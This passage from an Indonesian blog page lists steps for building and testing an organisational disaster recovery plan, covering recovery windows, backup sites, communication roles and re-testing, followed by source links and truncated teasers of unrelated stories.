2.    Determine the Recovery Window

Setelah mengidentifikasi aset yang ada maka berikutnya menentukan “recovery window” yaitu, berapa lama organisasi dapat bertahan tanpa menggunakan sebuah aset. Proses ini dilakukan pada setiap aset yang ada. Semakin cepat dibutuhkannya sebuah aset untuk kembali dapat digunakan, maka akan semakin mahal biaya yang harus dikeluarkan pada proses pemulihannya.

3.    Defining Recovery Solution

Langkah ketiga ini dibuat berdasarkan langkah pertama dan kedua, dimana organisasi menentukan pendekatan dan solusi terbaik yang akan dilakukan setelah mengetahui dampak yang ditimbulkan dari hilangnya setiap aset dan lama waktu pemulihannya. Solusi yang bisa diambil seperti melakukan backup data atau membuat copy data dan disimpan di sebuah lokasi off-site.

4.    Draft a Disaster Recovery Plan

Pada langkah ini berisikan bagaimana organisasi akan melindungi setiap aset dan juga menetukan proses yang akan dilakukan selanjutnya serta cara komunikasi yang akan digunakan selama disaster recovery berlangsung. Lebih jauh lagi langkah ini akan membahas berapa besar kerusakan yang ditanggung dan cara untuk meminimalisasi kerusakan.

5.    Establish a communications plan and assign roles

Langkah ini bertujuan untuk membuat perencanaan komunikasi antar employee maupun dengan customer dan menentukan role dan kewajiban dari setiap anggota tim disaster recovery. Komunikasi harus jelas dan tersedianya informasi kontak yang up-to-date dari setiap anggota tim, serta adanya penentuan chain of command sehingga komunikasi bisa berjalan teratur.

6.    Disaster Recovery Site Planning         

Langkah berikutnya adalah menentukan “recovery site” yaitu, lokasi yang ditujukan sebagai tempat menjalankan sistem yang digunakan dalam disaster recovery. Menentukan recovery site bertujuan untuk menghadapi sebuah situasi dimana data center yang menjadi lokasi utama penyimpanan data tidak dapat diakses

7.    Accessing Data and Applications

Pada langkah ini organisasi menentukan metode untuk mengkases data dan aplikasi pada data center utama. Pemindahan data ke recovery site dapat dilakukan secara manual, yang berarti tim disaster recovery harus segera menuju ke recovery site. Penggunaan metode ini akan memakan biaya transportasi. Metode lain adalah penggunaan web-server, dengan menggunakan metode ini maka sebagian besar tim dapat menggunakan desktop atau laptop untuk mengakses VPN.

8.    Document the Disaster Recovery Plan, in Detail

Pada langkah ini penting untuk membuat planning yang lebih detail untuk dapat melakukan pemindahan data ke recovery site dengan benar. Elemen penting dalam Disaster recovery plan adalah melakukan dokumentasi akan planning bagaimana data akan dikembalikan ke sistem semula setelah data center utama sudah kembali beroperasi, seperti melakukan synchronization data dan re-load server.

9.    Test Disaster Recovery Plan

Melakukan real test bertujuan untuk menyiapkan staff  dalam menghadapi situasi darurat dan juga untuk mencari kesalahan-kesalahan yang terdapat pada DRP. Test baik dilakukan berulang-ulang sesuai dengan perubahan sistem dan proses bisnis organiasi.

10.  Refine and Re-Test the Disaster Recovery Plan

Tahap terakhir adalah melakukan revisi sesuai dengan test yang sudah dilakukan sebelumnya dan melakukan test kedua untuk menguji plan yang sudah direvisi. Langkah ini juga baik dilakukan berulang-ulang  untuk menyesuaikan perubahan.

Sumber :

http://mamad4web.blogspot.com/2013/03/konsep-keamanan-jaringan.html#.VCv9f9J_sZk

http://ridwanaz.com/teknologi/komputer/memahami-konsep-dasar-keamanan-jaringan-dan-ancaman-yang-menyerang/

http://sitirida5.blogspot.com/2013/05/desain-sistem-keamanan-jaringan.html

http://nailahaznamutiara.blogspot.com/2011/11/jenis-jenis-sistem-keamanan-jaringan.html

http://jkt92.blogspot.com/2013/03/disaster-recovery-planning.html

Wiro Sableng #61 : Makam Tanpa Nisan

WIRO SABLENG

Pendekar Kapak Maut Naga Geni 212

Karya: Bastian Tito

MATAHARI belum lama tenggelam. Namun pulau kecil di pantai barat pesisir Andalas itu telah ter-bungkus kegelapan. Kesunyian yang mencengkam dibayang-bayangi oleh deru angin laut dan debur ombak yang memecah di pasir pulau. Sesekali kunang-kunang be-terbangan di udara, sesaat menjadi titik-titik terang yang tak ada artinya lalu menghilang lenyap dan kembali ke-gelapan kelam menghantui.

Sesosok tubuh berjalan terbungkuk-bungkuk dalam ke-gelapan. Gerakan kedua kakinya enteng dan hampir tidak terdengar. Namun binatangbinatang melata yang ber-telinga tajam dan ada disekitar situ masih dapat men-dengar gerakan langkah kaki orang ini lalu cepat-cepat melarikan diri menjauh.

Di samping serumpun pohon bakau orang ini hentikan langkahnya. Telinganya dipasang tajamtajam. Kedua mata-nya memandang tak berkesip ke muka. Di depannya dalam kegelapan dia melihat, ada mata air kecil jernih, yang mem-bentuk sebuah parit dangkal. Dia mengikuti parit itu ke arah seberang sana hingga pandangan matanya tertumbuk pada akar sebuah pohon yang sangat besar.

Lama orang ini menatap pohon besar yang tegak menyeramkan sejarak dua pu
... baca selengkapnya di Wiro Sableng #61 : Makam Tanpa Nisan Cerita Motivasi dan Inspirasi Nomor Satu

Mimpi Si Anak Kambing

Abil adalah bocah laki-laki berusia 7 tahun yang duduk di kelas II sekolah dasar. Abil tidak seperti anak kebanyakan yang menghabiskan waktu pulang sekolah dengan bermain. Dari kecil Abil terbiasa menghabiskan waktu untuk mengembala kambing milik tetangganya untuk mencukupi kehidupan keluarganya. Sampai-sampai Abil dipanggil oleh teman-temannya dengan sebutan “si anak kambing”.

Sepulang sekolah Abil dengan menyelendangkan tas terbuat dari karung goni membawa kambing-kambingnya ke padang rumput di pinggir hutan.
Di tengah perjalanan Abil bertemu teman-temannya yang tengah asyik bermain di lapangan.
“hai teman-teman lihat ada si anak kambing” teriak salah seorang temannya sambil menunjuk ke arahnya.
“anak kambing… anak kambing… anak kambing…” serentak teman-temannya mengejek.
Abil hanya tertunduk melanjutkan perjalanannya. Abil tidak pernah marah dengan ejekan-ejekan temannya karena dia tidak merasa seperti itu walau terkadang hatinya sering merasa kesal.

Setelah perjalanan yang melelahkan itu akhirnya sampailah si anak kambing it
... baca selengkapnya di Mimpi Si Anak Kambing Cerita Motivasi dan Inspirasi Nomor Satu

Semangkuk Bakso

Dikisahkan, biasanya di hari ulang tahun Putri, ibu pasti sibuk di dapur memasak dan menghidangkan makanan kesukaannya. Tepat saat yang ditunggu, betapa kecewa hati si Putri, meja makan kosong, tidak tampak sedikit pun bayangan makanan kesukaannya tersedia di sana. Putri kesal, marah, dan jengkel.

“Huh, ibu sudah tidak sayang lagi padaku. Sudah tidak ingat hari ulang tahun anaknya sendiri, sungguh keterlaluan,” gerutunya dalam hati. “Ini semua pasti gara-gara adinda sakit semalam sehingga ibu lupa pada ulang tahun dan makanan kesukaanku. Dasar anak manja!”

Ditunggu sampai siang, tampaknya orang serumah tidak peduli lagi kepadanya. Tidak ada yang memberi selamat, ciuman, atau mungkin memberi kado untuknya.

Dengan perasaan marah dan sedih, Putri pergi meninggalkan rumah begitu saja. Perut kosong dan pikiran yang dipenuhi kejengkelan membuatnya berjalan sembarangan. Saat melewati sebuah gerobak penjual bakso dan mencium aroma nikmat, tiba-tiba Putri sadar, betapa lapar perutnya! Dia menatap nanar kepulan asap di atas semangkuk bakso.

“Mau beli bakso, neng? Duduk saja di dalam,” sapa si tukang bakso.

“Mau, bang. Tapi saya tidak punya uang,” jawabnya tersipu malu.

“Bagaimana kalau hari ini abang traktir kamu? Duduklah, abang siapin mi bakso yang super enak.” Putri pun
... baca selengkapnya di Semangkuk Bakso Cerita Motivasi dan Inspirasi Nomor Satu